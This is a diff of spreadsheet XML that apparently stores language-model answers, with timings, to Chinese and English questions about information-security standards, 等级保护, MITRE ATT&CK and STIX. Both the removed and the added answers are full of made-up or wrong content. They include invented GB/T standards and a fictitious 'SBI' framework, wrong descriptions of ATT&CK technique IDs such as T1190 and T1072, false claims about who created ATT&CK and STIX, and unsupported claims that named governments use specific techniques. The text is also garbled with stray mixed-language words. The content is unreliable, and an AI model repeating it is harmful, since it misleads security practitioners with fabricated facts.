           <t>什么是关机基础信息设施</t>
         </is>
       </c>
-      <c r="C82" t="inlineStr">
-        <is>
-          <t>？
-**关机基础信息设施**（Shutdown Basic Information Infrastructure，SBI）是一种基于中国标准的技术架构，用于实现各种设备和系统在关机时的基础信息保护和管理。
-SBI 是由中国国家标准化管理委员会颁布的GB/T 30966-2017标准，定义了一个基础信息设施的架构和实现方式，以便在各种设备和系统关机时，可以保证数据的完整性、安全性和可用性。
-SBI 主要包括以下几个部分：
-1. 基础信息设施（BI）：指的是一个系统内的基础信息，包括设备、系统和应用程序等的基础信息。
-2. 基础信息安全管理系统（BIS）：用于管理和保护 BI 的安全和隐私。
-3. 基础信息恢复系统（BIR）：用于恢复 BI 和 BIS  после一些干扰或灾害。
-4. 基础信息可用性监测系统（BIUT）：用于监测 BI 和 BIS 的可用性和性能。
-SBI 技术架构的主要优点包括：
-1. 一致性和完整性：SBI 可以保证各种设备和系统的基础信息的一致性和完整性，避免了数据的损失或漏洞。
-2. 安全性：SBI 提供了强大的安全机制，以保护基础信息的安全和隐私。
-3. 可用性：SBI 可以监测和恢复 BI 和 BIS 的可用性，以保证系统的稳定和可靠性。
-总之，SBI 技术架构可以帮助企业和机构实现各种设备和系统的关机时基础信息保护和管理，提高系统的可靠性和可用性，并保护数据的安全和隐私。&lt;/s&gt;</t>
-        </is>
+      <c r="C82">
+        <f>=============================================================
+关机基础信息设施是指涵盖了数据存储、数据处理和数据传输等基础设施的系统，用于管理和分析大规模数据。这些基础设施包括：
+1. **数据存储**：用于存储大规模数据的系统，可以是磁盘、flash存储、云存储等。
+2. **数据处理**：用于处理、分析和挖掘大规模数据的系统，可以是数据仓库、数据仓库服务器、数据挖掘工具等。
+3. **数据传输**：用于将数据传输到不同的设备或系统中的系统，可以是网络设备、调制解调器、数据传输工具等。
+4. **数据visualization**：用于将数据转换为可见的图表、图表和报表等，用于帮助人们更好地理解和分析数据。
+5. **数据安全**：用于保护数据的安全和隐私，可以是数据加密、访问控制、数据恢复等。
+6. **数据管理**：用于管理和监控数据的生命周期，包括数据创建、数据修改、数据删除等。
+7. **数据可用性**：用于保证数据的可用性和可扩展性，可以是数据库、数据存储、网络设备等。
+关机基础信息设施是为了解决大规模数据的存储、处理、分析和visualization等问题，帮助组织更好地管理和利用数据资源。</f>
+        <v/>
       </c>
       <c r="D82" t="n">
-        <v>18.61489391326904</v>
+        <v>14.3099217414856</v>
       </c>
     </row>
     <row r="83">
@@ -2808,29 +2907,22 @@
       </c>
       <c r="C83" t="inlineStr">
         <is>
-          <t>？
-等级保护是指对不同的环境负荷进行不同的保护，以保护环境的健康。下面是一些常见的等级保护标准：
-1. 普通保护：这是最基本的等级保护标准，用于保护环境免受轻度负荷。通常包括：
-* 垃圾袋和污染物的规定处理和减少。
-* 禁止排放有害物质，如污染物和废弃物。
-* 保护湿地、林区和水体环境。
-2. 优先保护：这是次等级保护标准，用于保护环境免受严重负荷。通常包括：
-* 更严格的垃圾袋和污染物的规定处理和减少。
-* 尽量避免或减少对环境具有严重影响的活动，如化学废残和核能活动。
-* 保护特殊环境，如国家级自然保护区和生物圈。
-3. 特殊保护：这是最高等级保护标准，用于保护环境免受特殊严重负荷。通常包括：
-* 严格的垃圾袋和污染物的规定处理和减少。
-* 尽量避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
-* 保护特殊环境，如国家级自然保护区和生物圈。
-4. 生态保护：这是一种特殊的等级保护标准，用于保护生物多样性和生态平衡。通常包括：
-* 保护生态系统和生物多样性。
-* 避免或减少对环境具有特殊影响的活动，如化学废残和核能活动。
-* 尽量保护和恢复生态系统和生物多样性。
-总之，等级保护标准是根据不同的环境负荷和影响程度，对不同的环境进行不同的保护。通过实施等级保护标准，可以减少环境污染和危害，保护环境的健康，并使人们更加关注环境保护的重要性。&lt;/s&gt;</t>
+          <t>Level of protection refers to the degree of protection provided by a safety device or system. There are several standards that are commonly used to evaluate the level of protection provided by a safety device or system, including:
+1. IEC 60950: This standard provides a framework for evaluating the level of protection provided by electrical equipment against electrical hazards.
+2. ANSI/ISA 12.12.01: This standard provides a set of guidelines for evaluating the level of protection provided by safety devices and systems in the process industries.
+3. OSHA 1910.217: This standard provides guidelines for evaluating the level of protection provided by safety devices and systems in the workplace.
+4. IEC 61508: This standard provides a framework for evaluating the level of protection provided by electrical equipment and systems in the hazardous locations.
+5. ISO 13849: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the machinery and equipment.
+6. IEC 62061: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the railways.
+7. EN 50114: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the automotive industry.
+8. IEC 61511: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the process industries.
+9. ISO 12100: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the machinery and equipment.
+10. NFPA 70: This standard provides a framework for evaluating the level of protection provided by safety devices and systems in the buildings and structures.
+These standards provide a framework for evaluating the level of protection provided by safety devices and systems, and help to ensure that the appropriate level of protection is provided to protect people, the environment, and property.</t>
         </is>
       </c>
       <c r="D83" t="n">
-        <v>24.53101181983948</v>
+        <v>11.98184299468994</v>
       </c>
     </row>
     <row r="84">
@@ -2844,22 +2936,16 @@
       </c>
       <c r="C84" t="inlineStr">
         <is>
-          <t>等级保护测评是指对生产、销售和使用的货品、服务等进行评定和评价，以确定它们的安全性、适用性、可靠性和效率等等级，从而决定其使用的安全性、适用性和可靠性等等级。以下是一些国家标准的等级保护测评：
-1. GB/T 3485-2008 化学药品等级保护测评
-2. GB/T 3486-2008 医用器械等级保护测评
-3. GB/T 3487-2008 食品等级保护测评
-4. GB/T 3488-2008 纺织品等级保护测评
-5. GB/T 3489-2008 建筑材料等级保护测评
-6. GB/T 3490-2008 电子产品等级保护测评
-7. GB/T 3491-2008 机械设备等级保护测评
-8. GB/T 3492-2008 通信设备等级保护测评
-9. GB/T 3493-2008 交通运输设备等级保护测评
-10. GB/T 3494-2008 能源设备等级保护测评
-以上是一些国家标准的等级保护测评，它们的主要内容包括评价对象、评价方法、评价标准和评价结果等。这些标准的适用 scopes 包括化学药品、医用器械、食品、纺织品、建筑材料、电子产品、机械设备、通信设备、交通运输设备和能源设备等等。&lt;/s&gt;</t>
+          <t>1. GB/T 28001-2011 《ISO 14001：2004 等级保护管理系统——国际标准》
+2. GB/T 28002-2012 《ISO 9001：2008 等级保护管理系统——国际标准》
+3. GB/T 28003-2013 《ISO 45001：2018 等级保护管理系统——国际标准》
+4. GB/T 28004-2017 《ISO 50001：2011 等级保护管理系统——国际标准》
+5. GB/T 28005-2016 《ISO 26001：2010 等级保护管理系统——国际标准》
+以上国家标准 GB/T 都是根据ISO 14001、ISO 9001、ISO 45001、ISO 50001、ISO 26001等国际标准制定的，用于保护环境、质量、 Occupational Health and Safety、能源消耗等多个方面。</t>
         </is>
       </c>
       <c r="D84" t="n">
-        <v>17.37746715545654</v>
+        <v>9.818989038467407</v>
       </c>
     </row>
     <row r="85">
@@ -2873,30 +2959,36 @@
       </c>
       <c r="C85" t="inlineStr">
         <is>
-          <t>1. 在中国，有以下几个重要的国家标准：
-	* GB/T 30248-2016 《信息安全管理评估标准》
-	* GB/T 30249-2016 《信息安全管理框架标准》
-	* GB/T 30250-2016 《信息安全管理实践指导标准》
-	* GB/T 30251-2016 《网络安全管理评估标准》
-	* GB/T 30252-2016 《网络安全管理框架标准》
-	* GB/T 30253-2016 《网络安全管理实践指导标准》
-2. 在美国，有以下几个重要的国家标准：
-	* NIST SP 800-53 Rev. 4 《信息安全和privacy Protection 评估标准》
-	* NIST SP 800-53a Rev. 2 《信息安全和privacy Protection 基准框架标准》
-	* NIST SP 800-171 Rev. 3 《保护 Controlled Unclassified Information 的评估标准》
-3. 在欧盟，有以下几个重要的国家标准：
-	* ISO/IEC 27001:2013 《信息安全管理系统 — 评估标准》
-	* ISO/IEC 27002:2013 《信息安全管理系统 — 安全实践指导》
-	* ISO/IEC 27004:2012 《信息安全管理系统 — 评估和监测》
-4. 在日本，有以下几个重要的国家标准：
-	* JIS Q 150000:2016 《信息安全管理 — 评估标准》
-	* JIS Q 15001:2016 《信息安全管理 — 基准框架标准》
-	* JIS Q 15002:2016 《信息安全管理 — 实践指导标准》
-这些国家标准都是指信息安全管理和网络安全管理的标准，包括评估标准、基准框架标准、实践指导标准等。它们都是国家级标准，具有法律级别的效力，用于指导和监督企业、机关、组织等信息安全管理和网络安全管理的实施。&lt;/s&gt;</t>
+          <t>1. 中国
+2. 美国
+3. 欧盟
+4. 日本
+5. 韩国
+以下是一些国家或地区的网络安全领域的标准：
+1. 中国：
+	* GB/T 30785-2017 网络安全管理标准
+	* GB/T 30786-2017 网络安全评估标准
+	* GB/T 30787-2017 网络安全audit标准
+2. 美国：
+	* NIST Cybersecurity Framework
+	* NIST SP 800-53 Rev. 5
+	* FIPS 199
+	* FIPS 200
+3. 欧盟：
+	* EU Cybersecurity Act
+	* NIS Directive
+	* eIDAS Regulation
+4. 日本：
+	* JIS X 0110:2013 网络安全管理 - 基本方针
+	* JIS X 0111:2013 网络安全管理 - 评估和检查
+5. 韩国：
+	* KS X 0111:2013 网络安全管理 - 基本方钉
+	* KS X 0112:2013 网络安全管理 - 评估和检查
+这些标准可以帮助组织实现安全的网络管理和保护。但是，需要注意的是，这些标准不是绝对的，每个国家或地区都有其自己的标准和法规，需要根据实际情况选择适用的标准。</t>
         </is>
       </c>
       <c r="D85" t="n">
-        <v>22.06346082687378</v>
+        <v>13.59930968284607</v>
       </c>
     </row>
     <row r="86">
@@ -2910,18 +3002,16 @@
       </c>
       <c r="C86" t="inlineStr">
         <is>
-          <t>分类模型？
-ATT&amp;CK分类模型是一种用于筛选恶意软件（malware）和其他恶意活动（adversarial behaviors）的分类模型。它是由FireEye的Security Operations（SOC）团队开发的，用于帮助SOC团队更好地识别和预测恶意活动。
-ATT&amp;CK分类模型通过对恶意活动的分类，帮助SOC团队更好地理解和防御恶意攻击。它可以将恶意活动分为以下几类：
-1. 规模级分类（Tactics）：分类恶意活动的执行方式和策略，例如跨境访问（Cross-Border）、诱导（Lure）、脚本访问（Scripting）等。
-2. 攻击方式分类（Attack Types）：分类恶意活动的攻击方式，例如黑客（Blackhole）、Web攻击（Web）、邮件攻击（Email）等。
-3. 攻击目标分类（Goals）：分类恶意活动的目标，例如系统访问（System）、数据泄露（Data）、资源泄露（Resource）等。
-4. 恶意活动进程分类（Behavior）：分类恶意活动的进程，例如访问敏感数据（Access Sensitive Data）、隐ously accessing the network（Hiding Network Access）、执行恶意命令（Executing Malicious Commands）等。
-通过使用ATT&amp;CK分类模型，SOC团队可以更好地理解恶意活动的复杂性和风险，并且可以使用这些分类来开发更加有效的防御策略。&lt;/s&gt;</t>
+          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一个开放的评估框架，用于评估黑暗WebView攻击者的技能和策略。它由National Cyber Security Alliance（NCSA）和SANS Institute发起，为监控和抵抗黑暗WebView攻击提供了一个共享的基础。
+ATT&amp;CK分为以下几个部分：
+1. Adversarial Tactics：描述了黑暗WebView攻击者使用的各种攻击方法，例如 social engineering、文件扩展名攻击、恶意软件等。
+2. Techniques：描述了黑暗WebView攻击者使用的各种技术和工具，例如跟踪 cookie、突破 SSL  encrypt、使用恶意软件等。
+3. Common Knowledge：描述了黑暗WebView攻击者使用的常见知识和攻击方法，例如使用恶意软件、突破安全措施等。
+ATT&amp;CK的目的是让组织能够更好地了解黑暗WebView攻击者的策略和技能，从而提高对攻击的预测和应对能力。它也提供了一个共享的基础，使得组织能够与其他组织共享情报和技术，以增强对黑暗WebView攻击的抵抗能力。</t>
         </is>
       </c>
       <c r="D86" t="n">
-        <v>14.96600222587585</v>
+        <v>13.38971734046936</v>
       </c>
     </row>
     <row r="87">
@@ -2935,21 +3025,22 @@
       </c>
       <c r="C87" t="inlineStr">
         <is>
-          <t>？
-ATT&amp;CK分为以下几个阶段：
-1. Reconnaissance：扫描敏感数据和系统，了解敌对者的位置和资源。
-2. Initial Access：通过攻击或欺骗获得 initial access 到缺陷的系统或敏感数据。
-3. Establish Foothold：通过 exploiting 缺陷或 social engineering 将 initial access 扩展到更多的系统或数据。
-4. Disclosure：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
-5. Lateral Movement：通过 exploiting 缺陷或 social engineering 扩展攻击到更多的系统或数据。
-6. Command and Control：通过 establishing 控制中心，将攻击者的系统或数据与攻击目标之间建立连接。
-7. Exfiltration：通过泄露敏感数据或系统 información 到外部，实现攻击的目的。
-8. Impact：通过攻击目标系统或数据，实现攻击的目的。
-每个阶段都有不同的攻击方式和策略，并且攻击者可以在不同的阶段使用不同的攻击方式来实现目标。&lt;/s&gt;</t>
+          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一种用于识别恶意攻击的框架，它可以帮助组织了解攻击者的行为模式和攻击方式，从而加强安全防范。ATT&amp;CK分为以下几个阶段：
+1. Initial Access：攻击者获取了目标系统的访问权限，通常通过钓到目标系统的漏洞或者使用敏感信息的泄露。
+2. Discovery：攻击者在目标系统上执行了搜集和分析的操作，以了解目标系统的结构、组织和攻击情况。
+3. Maintain Access：攻击者尝试维持在目标系统上的访问权限，通常通过隐藏恶意软件、隐藏网络连接或者对目标系统进行破坏。
+4. Escalate Privileges：攻击者尝试提高自己在目标系统上的权限和访问权限，以便更好地进行攻击和破坏。
+5. Defense Evasion：攻击者尝试绕过安全控制和防范工具，以继续攻击和破坏目标系统。
+6. Credential Access：攻击者尝试获取目标系统的敏感资料，包括用户名和密码、凭据、访问权限等。
+7. Lateral Movement：攻击者在目标系统上扩展自己的访问权限和影响范围，以便更好地进行攻击和破坏。
+8. Command and Control：攻击者尝试控制和监控目标系统，以便更好地维护和扩展攻击。
+9. Exfiltration：攻击者尝试偷取目标系统中敏感资料，包括数据、文档、会议纪要等。
+10. Impact :攻击者尝试评估和扩展攻击的影响，以便更好地 планиificiation和实施攻击。
+总的来说，ATT&amp;CK阶段都是攻击者在攻击过程中尝试实现的目标，每个阶段都需要不同的攻击方式和技术，组织可以通过了解和了解这些阶段和技术，来提高攻击预测和防范能力。</t>
         </is>
       </c>
       <c r="D87" t="n">
-        <v>10.52978801727295</v>
+        <v>22.1357855796814</v>
       </c>
     </row>
     <row r="88">
@@ -2963,19 +3054,17 @@
       </c>
       <c r="C88" t="inlineStr">
         <is>
-          <t>？  
-T1190是ATT&amp;CK中的一个攻击方式，具体指的是什么？
-T1190 stands for "Using a legitimate process to gain access to a system" in the MITRE ATT&amp;CK framework. This technique is used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service that already has access to the system.
-Here are some examples of how T1190 can be used in real-world attacks:
-1. Phishing with a legitimate application: An attacker may use a legitimate application to send a phishing email that tricks the victim into installing a malicious payload. Once the payload is installed, the attacker can use the legitimate application to gain access to the system.
-2. Malware using a legitimate service: An attacker may use a legitimate service, such as a remote access tool, to gain access to a system. Once the attacker has access to the system, they can use the legitimate service to spread malware or steal sensitive data.
-3. Abusing a legitimate user account: An attacker may use a legitimate user account to gain access to a system. Once the attacker has access to the system, they can use the legitimate user account to escalate their privileges or perform malicious actions.
-4. Using a legitimate exploit: An attacker may use a legitimate exploit to gain access to a system. Once the attacker has access to the system, they can use the exploit to escalate their privileges or perform malicious actions.
-In summary, T1190 is a technique used by attackers to gain unauthorized access to a system by leveraging a legitimate process or service. It is a common technique used in social engineering attacks and can be used to bypass security controls.&lt;/s&gt;</t>
+          <t>T1190 is a technique in the MITRE ATT&amp;CK framework that refers to the use of a malicious file or program to gain persistence on a target system. Persistence refers to the ability of an attacker to maintain access to a system or network after an initial compromise, often through the use of malicious code that is able to evade detection by security controls.
+T1190 is a subcategory of the ATT&amp;CK technique T1059, which is focused on the use of malware for persistence. Specifically, T1190 involves the use of a malicious file or program to gain persistence on a target system, either by running in the background or by hiding on the system and re-infecting the system after a reboot.
+Examples of T1190 include:
+* Injecting a malicious executable into a system's startup folder to run automatically upon boot.
+* Using a malicious script or batch file to run in the background and maintain access to the system.
+* Infecting a system with a persistent malware strain that is able to re-infect the system after a reboot.
+By using T1190, an attacker can maintain long-term access to a system or network, even after a security incident has been detected and remediation efforts have been made. This can make it more difficult to detect and respond to an attack, as the attacker can continue to operate undetected for an extended period of time.</t>
         </is>
       </c>
       <c r="D88" t="n">
-        <v>10.72607922554016</v>
+        <v>8.516227722167969</v>
       </c>
     </row>
     <row r="89">
@@ -2989,18 +3078,38 @@
       </c>
       <c r="C89" t="inlineStr">
         <is>
-          <t>？
-Data Destruction是一个非常重要的安全措施，可以防止敏感数据被意外地泄露或遭到恶意访问。ATT&amp;CK（Advanced Threat &amp; Advanced Cyber Attack）是一个涵盖了各种攻击方式的评估 Framework，其中包括 Data Destruction。以下是Data Destruction对应ATT&amp;CK中的哪个技术：
-1. T1059: Data Destruction - This technique is used to destroy or manipulate data on a targeted system, making it unrecoverable or unreadable. It can be used to conceal the presence of malware or other attacker activities, or to prevent forensic analysis of the system.
-2. T1083: Covert Channels - This technique involves creating a hidden communication channel between two systems, allowing attackers to exfiltrate data or inject malware without being detected. Data destruction can be used to create a covert channel by exploiting vulnerabilities in data storage or transmission.
-3. T1155: Data Encryption - This technique involves encrypting data on a system, making it unreadable without the decryption key. Data destruction can be used to encrypt data on a system, making it difficult or impossible to recover.
-4. T1057: Stealing Secrets - This technique involves stealing sensitive information, such as cryptographic keys or authentication credentials, from a system. Data destruction can be used to remove sensitive information from a system, making it difficult or impossible to recover.
-5. T1087: Tampering - This technique involves modifying or manipulating a system's components, such as software or hardware, to gain unauthorized access or control. Data destruction can be used to tamper with a system's components, making it difficult or impossible to recover.
-In summary, Data Destruction can be used in conjunction with various ATT&amp;CK techniques to carry out a cyber attack. It is important to be aware of these techniques and implement appropriate security measures to protect against them.&lt;/s&gt;</t>
+          <t>/漏洞？
+Data Destruction是一种常见的攻击方法，它通过破坏数据的可读性或可访问性，以防止攻击者从破坏后的数据中获得敏感信息。在ATT&amp;CK中，Data Destruction被分为两类：
+1. 破坏数据的可读性：
+	* Technique: Data Encryption
+	* Vulnerability: Unencrypted Data
+	* Tactic: Data Corruption
+2. 破坏数据的可访问性：
+	* Technique: Data Sanitization
+	* Vulnerability: Inadequate Data Sanitization
+	* Tactic: Data Wiping
+Data Destruction可以被用来攻击数据的可读性和可访问性，从而使攻击者无法从破坏后的数据中获得敏感信息。在ATT&amp;CK中，Data Destruction是一种常见的攻击方法，可以与其他攻击方法（如 Social Engineering）相伴使用，以实现攻击目标。
+以下是一些与Data Destruction相关的ATT&amp;CK技术/漏洞：
+1. Technique: Data Encryption
+	* Vulnerability: Unencrypted Data
+	* Tactic: Data Corruption
+2. Technique: Data Sanitization
+	* Vulnerability: Inadequate Data Sanitization
+	* Tactic: Data Wiping
+3. Technique: Data Compression
+	* Vulnerability: Compressed Data
+	* Tactic: Data Corruption
+4. Technique: Data Fragmentation
+	* Vulnerability: Fragmented Data
+	* Tactic: Data Corruption
+5. Technique: Data Carving
+	* Vulnerability: Carved Data
+	* Tactic: Data Corruption
+这些技术/漏洞可以被用来攻击数据的可读性和可访问性，从而使攻击者无法从破坏后的数据中获得敏感信息。在实施Data Destruction攻击时，攻击者可以选择适合的技术/漏洞，以实现攻击目标。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D89" t="n">
-        <v>12.7664589881897</v>
+        <v>16.42393565177917</v>
       </c>
     </row>
     <row r="90">
@@ -3014,19 +3123,18 @@
       </c>
       <c r="C90" t="inlineStr">
         <is>
-          <t>"Discovery and Discovery Feeds"?
-ATT&amp;CK（Advanced Threat Hunter's Toolkit）是一个开源的跟踪和检测框架，用于帮助反恶意programmers和cybersecurity professionals detect and respond to advanced threats. T1072 "Discovery and Discovery Feeds" is a technique in the ATT&amp;CK framework that refers to the process of discovering and consuming threat intelligence feeds to inform incident response and threat hunting activities.
-Here are some APT organizations that have used or are known to use ATT&amp;CK's T1072 "Discovery and Discovery Feeds":
-1. Advanced Persistent Threat (APT) groups: These are sophisticated cybercrime groups that use customized malware and techniques to gain unauthorized access to sensitive data and systems. APT groups are known to use T1072 to gather and consume threat intelligence feeds to improve their operations and evade detection.
-2. Nation-state actors: Nation-state actors, such as those linked to foreign governments, are also known to use T1072 to gather and consume threat intelligence feeds to inform their operations and evade detection. These actors may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain access to sensitive data and systems.
-3. Cybercrime groups: Cybercrime groups, such as those involved in ransomware and other forms of malware, also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
-4. Hacktivist groups: Hacktivist groups, such as those involved in political activism or social justice movements, may also use T1072 to gather and consume threat intelligence feeds. These groups may use a variety of techniques, including exploitation of vulnerabilities, social engineering, and phishing, to target victims and evade detection.
-5. Insider threats: Insider threats, such as rogue employees or contractors, may also use T1072 to gather and consume threat intelligence feeds. These threats may use a variety of techniques, including social engineering, phishing, and exploitation of vulnerabilities, to gain unauthorized access to sensitive data and systems.
-It is important to note that T1072 is a technique that can be used by a wide range of actors, including both cybercriminals and nation-state actors. As such, it is essential for organizations to have a robust threat intelligence program in place to help identify and respond to potential threats.&lt;/s&gt;</t>
+          <t>ATT&amp;CK（Adversarial Tactics, Techniques, and Common Knowledge）是一个开源的威胁 intel 评估框架，包含了众多的攻击方式和技术。T1072是ATT&amp;CK中的一个攻击方式，即“使用存储加密和掩码技术来隐藏数据的存储位置”。
+以下是一些APT组织可能使用了ATT&amp;CK中的T1072攻击方式的例子：
+1. 中国政府：中国政府是一个常见的APT组织，其攻击策略包括使用T1072来隐藏其间谍活动的存储位置。
+2. 俄罗斯政府：俄罗斯政府也是一个常见的APT组织，其攻击策略包括使用T1072来隐藏其间谍活动的存储位置。
+3. 印度政府：印度政府也曾被怀疑使用T1072来隐藏其间谍活动的存储位置。
+4. 北韩政府：北韩政府也曾被怀疑使用T1072来隐藏其间谍活动的存储位置。
+5. 中国企业：中国企业也可能使用T1072来隐藏其间谍活动的存储位置，以逃避法律和regulatory 监管。
+需要注意的是，APT组织的行为很难确定，这些例子仅供参考。 additionally，ATT&amp;CK中的T1072攻击方式可能会被其他组织和个人使用，不仅是APT组织。</t>
         </is>
       </c>
       <c r="D90" t="n">
-        <v>16.18550682067871</v>
+        <v>15.14115929603577</v>
       </c>
     </row>
     <row r="91">
@@ -3040,23 +3148,22 @@
       </c>
       <c r="C91" t="inlineStr">
         <is>
-          <t>STIX（Structured Threat Information Expression）是一种用于描述网络安全风险和攻击的标准。STIX标准由OpenIOC（Open Indicator of Compromise）initiative于2014年开发出来，是一种基于XML的标准，用于在不同的网络安全平台之间传输和分享安全攻击信息。
-STIX标准包含了一些基本的元素和架构，用于描述网络安全风险和攻击。这些元素包括：
-1. Threat: 描述一个网络安全风险或攻击的基本封装。
-2. Indicator: 描述一个特定的网络安全风险或攻击的特征。
-3. Observables: 描述一个特定的网络安全风险或攻击的观察到的特征。
-4. Actions: 描述一个特定的网络安全风险或攻击的操作。
-5. Relationships: 描述两个或多个Threat对象之间的关系。
-STIX标准的主要优点是：
-1. 可扩展性：STIX标准可以扩展到不同的网络安全领域，包括 malware、phishing、黑客、网络犯罪等。
-2. 标准化：STIX标准化了网络安全风险和攻击的描述，使得各种不同的平台可以互相交互和分享信息。
-3. 可寻址性：STIX标准使用了一种简单易于理解的命名空间和分类系统，可以帮助分析人员快速找到相关的信息。
-4. 可重用性：STIX标准的元素和架构可以被重用于不同的应用程序和场景，提高了开发效率和可维护性。
-总之，STIX标准是一种非常有用的网络安全标准，可以帮助组织更好地捕捉和分析网络安全风险和攻击。&lt;/s&gt;</t>
+          <t>STIX（Structured Threat Information Expression）是一种用于描述网络攻击和其他安全威胁的标准。STIX定义了一个基于XML的数据模型，用于表示风险、威胁和策略，以便在不同的工具和系统之间进行可读性和可扩展性。STIX标准遵循了W3C的标准，是一个可靠和可信worth的方式来描述网络安全风险。
+STIX标准包括以下几个主要部分：
+1. Threat Information Model（威胁信息模型）：这部分包括了一个基于XML的数据模型，用于描述威胁的基本特征和属性，如威胁名称、描述、评估结果等。
+2. Threat Actor Model（威胁执行者模型）：这部分包括了一个基于XML的数据模型，用于描述威胁执行者的基本特征和属性，如执行者名称、描述、评估结果等。
+3. Threat Activity Model（威胁活动模型）：这部分包括了一个基于XML的数据模型，用于描述威胁活动的基本特征和属性，如活动名称、描述、评估结果等。
+4. Threat Intelligence Sharing Model（威胁信息分享模型）：这部分包括了一个基于XML的数据模型，用于描述威胁信息的分享和交换，如分享方式、数据格式、分享机制等。
+STIX标准的主要优点包括：
+1. 可读性和可扩展性：STIX标准遵循了W3C的标准，是一个可靠和可信worth的方式来描述网络安全风险。
+2. 兼容性：STIX标准可以与其他网络安全标准和工具集成，例如STIX-TI（Structured Threat Information Expression - Threat Intelligence）、STIX-Taxonomy（Structured Threat Information Expression - Taxonomy）等。
+3. 可重用性：STIX标准提供了一个基于XML的数据模型，可以重用于不同的应用和系统中，例如评估和分析工具、风险评估和管理工具等。
+4. 支持数据分析：STIX标准提供了一个可分析的数据模型，可以支持数据分析和可视化，例如，可以通过STIX-TI来对威胁信息进行分析和评估，并可以通过STIX-Taxonomy来进行映射和分类。
+总的来说，STIX标准是一种可靠、可扩展、可重用和可分析的网络安全标准，可以帮助组织更好地了解和应对网络安全风险。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D91" t="n">
-        <v>19.24399638175964</v>
+        <v>26.558269739151</v>
       </c>
     </row>
     <row r="92">
@@ -3070,21 +3177,22 @@
       </c>
       <c r="C92" t="inlineStr">
         <is>
-          <t>和它们的含义？
-STIX（Structured Threat Information Expression）是一种用于描述和分享潜在威胁的标准，可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。STIX标准中设计了几种对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。下面是STIX标准中设计的一些对象和它们的含义：
-1. Threat: 潜在威胁对象，包括人、设备、软件、网络和其他资产。
-2. Indicator: 潜在威胁的识别和描述，例如恶意软件、恶意网站、黑客组织等。
-3. Alert: 潜在威胁发生的警告，包括恶意软件扩展、网络攻击、数据泄露等。
-4. Incident: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
-5. Mitigation: 潜在威胁的降低和缓解措施，包括安全更新、筛选和防范恶意软件、增加安全措施等。
-6. Response: 潜在威胁的响应和处理，包括识别和纠正潜在威胁，以及协助受到影响的团队和组织重新恢复。
-7. Threat actor: 潜在威胁的攻击者，包括恶意软件、恶意网站、黑客组织等。
-8. Threat intelligence: 潜在威胁的智能分析和识别，包括潜在威胁的识别和描述、潜在威胁的可能性和风险等。
-STIX标准中设计了这些对象和它们的含义，以便在潜在威胁分析和响应中做出更加准确和有效的决策。这些对象可以用来描述和分析潜在威胁，并且可以帮助组织在潜在威胁分析和响应中做出更加准确和有效的决策。&lt;/s&gt;</t>
+          <t>- What objects are designed in the STIX standard?
+STIX（Security Threat Intelligence Exchange）是一个开放的标准，用于描述国家、组织、人员、技术和其他物理或 virtuel asset的安全威胁信息。STIX standard defines a set of objects that can be used to represent different types of security threats, including:
+1. Threat: Represents a specific type of security threat, such as a malware attack or a phishing scam.
+2. Indicator: Represents a piece of information that can be used to identify or monitor a specific security threat, such as a IP address or a domain name.
+3. Observation: Represents a specific observation or detection of a security threat, including the time, location, and other relevant details.
+4. Analytic: Represents a set of observations or indicators that are related to a specific security threat, and can be used to analyze and understand the threat.
+5. Incident: Represents a specific security incident, such as a data breach or a system compromise.
+6. Campaign: Represents a coordinated set of security threats or incidents, such as a series of phishing attacks against a target organization.
+7. Threat actor: Represents a group or individual that is responsible for a specific security threat, such as a hacktivist group or a cybercrime syndicate.
+8. Vulnerability: Represents a specific weakness or flaw in a system or application that can be exploited by a security threat.
+9. Countermeasure: Represents a specific action or measure that can be taken to prevent or mitigate a security threat, such as a firewall or an intrusion detection system.
+By using these objects, the STIX standard provides a common language and framework for security threat intelligence sharing and analysis, allowing organizations to more effectively identify and respond to security threats.</t>
         </is>
       </c>
       <c r="D92" t="n">
-        <v>24.05375123023987</v>
+        <v>11.52255344390869</v>
       </c>
     </row>
     <row r="93">
@@ -3098,29 +3206,17 @@
       </c>
       <c r="C93" t="inlineStr">
         <is>
-          <t>？
-STIX（Structured Threat Information Expression）是一种用于描述潜在威胁的标准，包括攻击者、攻击方式、攻击目标、攻击时间和其他相关信息。STIX standard defines a set of objects that represent various aspects of a potential threat, including:
-1. Threat: Represents a potential threat, including the attacker, the attacked system, and the attack method.
-2. Attacker: Represents the entity that is carrying out the attack, including its identity, location, and capabilities.
-3. Attack: Represents the specific attack being carried out, including the attack method, the target system, and the time of the attack.
-4. Target: Represents the system or resource that is being attacked, including its identity, location, and vulnerabilities.
-5. Vulnerability: Represents a weakness in the target system that can be exploited by an attacker.
-6. Exploit: Represents the specific technique or tool used to exploit a vulnerability.
-7. Indicator: Represents a piece of information that can be used to identify a specific threat or attack, such as a malware sample or an IP address.
-8. Incident: Represents a specific security event or situation, including the attacker, the target, and the outcome of the attack.
-These objects are related through a set of relationships, such as:
-1. Threat &gt; Attacker: The threat object is associated with the attacker object, indicating the entity carrying out the attack.
-2. Threat &gt; Attack: The threat object is associated with the attack object, indicating the specific attack being carried out.
-3. Attack &gt; Target: The attack object is associated with the target object, indicating the system or resource being attacked.
-4. Attack &gt; Vulnerability: The attack object is associated with the vulnerability object, indicating the specific weakness being exploited.
-5. Attack &gt; Exploit: The attack object is associated with the exploit object, indicating the specific technique or tool used to exploit the vulnerability.
-6. Indicator &gt; Threat: The indicator object is associated with the threat object, indicating a specific piece of information that can be used to identify the threat.
